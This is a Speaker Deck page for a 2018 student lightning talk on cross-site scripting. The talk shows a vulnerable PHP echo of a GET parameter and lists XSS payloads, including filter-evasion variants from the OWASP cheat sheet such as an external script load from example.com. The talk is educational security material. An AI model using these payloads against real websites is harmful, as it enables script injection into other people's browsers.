Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
XSSの入力値を調べてみた / searching xss insertion value
Search
Tomoyuki KOYAMA
February 03, 2018
Technology
3
1.3k
XSSの入力値を調べてみた / searching xss insertion value
2018/02/03 学生LT at freee
Tomoyuki KOYAMA
February 03, 2018
Tweet
Share
More Decks by Tomoyuki KOYAMA
See All by Tomoyuki KOYAMA
Log message with JSON item count for root cause analysis in microservices
tomoyk
0
84
Distributed Log Search Based on Time Series Access and Service Relations
tomoyk
0
190
Webアプリを動かすまでのインフラ構築 / infra-build-for-web-app
tomoyk
0
310
コンピュータが大好きな私が大学院進学した理由 / Why I chose graduate school
tomoyk
2
690
この先生きのこるための学び方 / how-to-learn-tech
tomoyk
1
320
佐川急便のフィッシングサイトを調べてみた / Analysis of sagawa fishing site
tomoyk
1
120
既存のWebアプリをセキュアにするためにやったこと / Student-LT-WebSec
tomoyk
0
140
パケットを覗いてみよう / Packet workshop for beginners
tomoyk
0
250
ブレース展開のススメ
tomoyk
0
440
Other Decks in Technology
See All in Technology
Python と Snowflake はズッ友だょ!~ Snowflake の Python 関連機能をふりかえる ~
__allllllllez__
2
140
M&A戦略を支えるデータマネジメント (MIDAS Tech Study #16 GENDA Komiyama)
kommy339
1
120
障害対応をちょっとずつよくしていくための 演習の作りかた
heleeen
1
1.7k
Building a RAG-poweredAI chat appwith Python and VS Code
pamelafox
0
160
web-application-security
matsuihidetoshi
1
190
ゼロから始めるVue.jsコミュニティ貢献 / first-vuejs-community-contribution-link-and-motivation
lmi
1
150
チームでロジカルシンキングに改めて向き合っている話 〜学習環境と実践⽅法〜
sansantech
PRO
3
3.3k
生産性向上チームの紹介
cybozuinsideout
PRO
1
920
【SORACOM UG 東海】あらゆるモノがつながる社会へ、IoT と SORACOM
soracom
PRO
1
140
AWS学習者向けにAzureの解説スライドを作成した話
handy
3
190
VSCodeの拡張機能を作っている話
ebarakazuhiro
1
810
LangSmith入門―トレース/評価/プロンプト管理などを担うLLMアプリ開発プラットフォーム
os1ma
5
720
Featured
See All Featured
Facilitating Awesome Meetings
lara
43
5.6k
How to Ace a Technical Interview
jacobian
273
22k
Easily Structure & Communicate Ideas using Wireframe
afnizarnur
188
16k
The Success of Rails: Ensuring Growth for the Next 100 Years
eileencodes
33
6k
Debugging Ruby Performance
tmm1
70
11k
Large-scale JavaScript Application Architecture
addyosmani
504
110k
Reflections from 52 weeks, 52 projects
jeffersonlam
345
19k
The Cult of Friendly URLs
andyhume
74
5.7k
Understanding Cognitive Biases in Performance Measurement
bluesmoon
11
1k
Building Applications with DynamoDB
mza
88
5.6k
It's Worth the Effort
3n
180
27k
Faster Mobile Websites
deanohume
300
30k
Transcript
XSS
B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,
Seccamp, etc
XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input
During Web Page Generation ('Cross-site Scripting') (3.0)
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>
XSS Stored XSS( ) Re ected XSS( ) DOM Based
XSS
XSS == XSS
<script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)
<- a href
XSS
? / . XSS . XSS .
?
OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html
( ) 3
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">
</script>
[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>
[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )
. ... <img src="x" onerror="javascript:alert('XSS')">
( )
( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;
URL=http://;URL=http://yahoo.co.jp/;">
None
Electron Marp Electron Web ... <script>alert()</script> alert ...( )
?
JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider
on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “
XSS XSS alert() Electron